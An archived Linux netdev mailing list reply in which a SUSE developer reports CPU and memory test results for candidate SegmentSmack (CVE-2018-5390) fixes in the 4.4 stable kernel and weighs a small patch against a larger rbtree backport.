netdev - Re: [PATCH stable 4.4 0/9] fix SegmentSmack in stable branch (CVE-2018-5390)

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]

Message-ID: <20180816160616.u3refk4mqpyqagzi@unicorn.suse.cz>
Date:   Thu, 16 Aug 2018 18:06:16 +0200
From:   Michal Kubecek <mkubecek@...e.cz>
To:     Greg KH <gregkh@...ux-foundation.org>
Cc:     maowenan <maowenan@...wei.com>, dwmw2@...radead.org,
        netdev@...r.kernel.org, eric.dumazet@...il.com,
        edumazet@...gle.com, davem@...emloft.net, ycheng@...gle.com,
        jdw@...zon.de, stable@...r.kernel.org, Takashi Iwai <tiwai@...e.de>
Subject: Re: [PATCH stable 4.4 0/9] fix SegmentSmack in stable branch
 (CVE-2018-5390)

On Thu, Aug 16, 2018 at 05:24:09PM +0200, Greg KH wrote:
> On Thu, Aug 16, 2018 at 02:33:56PM +0200, Michal Kubecek wrote:
> > 
> > Anyway, even at this rate, I only get ~10% of one core (Intel E5-2697).
> > 
> > What I can see, though, is that with current stable 4.4 code, modified
> > testcase which sends something like
> > 
> >   2:3, 3:4, ..., 3001:3002, 3003:3004, 3004:3005, ... 6001:6002, ...
> > 
> > I quickly eat 6 MB of memory for receive queue of one socket while
> > earlier 4.4 kernels only take 200-300 KB. I didn't test latest 4.4 with
> > Takashi's follow-up yet but I'm pretty sure it will help while
> > preserving nice performance when using the original segmentsmack
> > testcase (with increased packet ratio).
> 
> Ok, for now I've applied Takashi's fix to the 4.4 stable queue and will
> push out a new 4.4-rc later tonight.  Can everyone standardize on that
> and test and let me know if it does, or does not, fix the reported
> issues?

I did repeat the tests with Takashi's fix and the CPU utilization is
similar to what we have now, i.e. 3-5% with 10K pkt/s. I could still
saturate one CPU somewhere around 50K pkt/s but that already requires
2.75 MB/s (22 Mb/s) of throughput. (My previous tests with Mao Wenan's
changes in fact used lower speeds as the change from 128 to 1024 would
need to be done in two places.)

Where Takashi's patch does help is that it does not prevent collapsing
of ranges of adjacent segments with total length shorter than ~4KB. It
took more time to verify: it cannot be checked by watching the socket
memory consumption with ss as tcp_collapse_ofo_queue isn't called until
we reach the limits. So I needed to trace when and how tcp_collpse() is
called with both current stable 4.4 code and one with Takashi's fix.

> If not, we can go from there and evaluate this much larger patch
> series.  But let's try the simple thing first.

At high packet rates (say 30K pkt/s and more), we can still saturate the
CPU. This is also mentioned in the announcement with claim that switch
to rbtree based queue would be necessary to fully address that. My tests
seem to confirm that but I'm still not sure it is worth backporting
something as intrusive into stable 4.4.

Michal Kubecek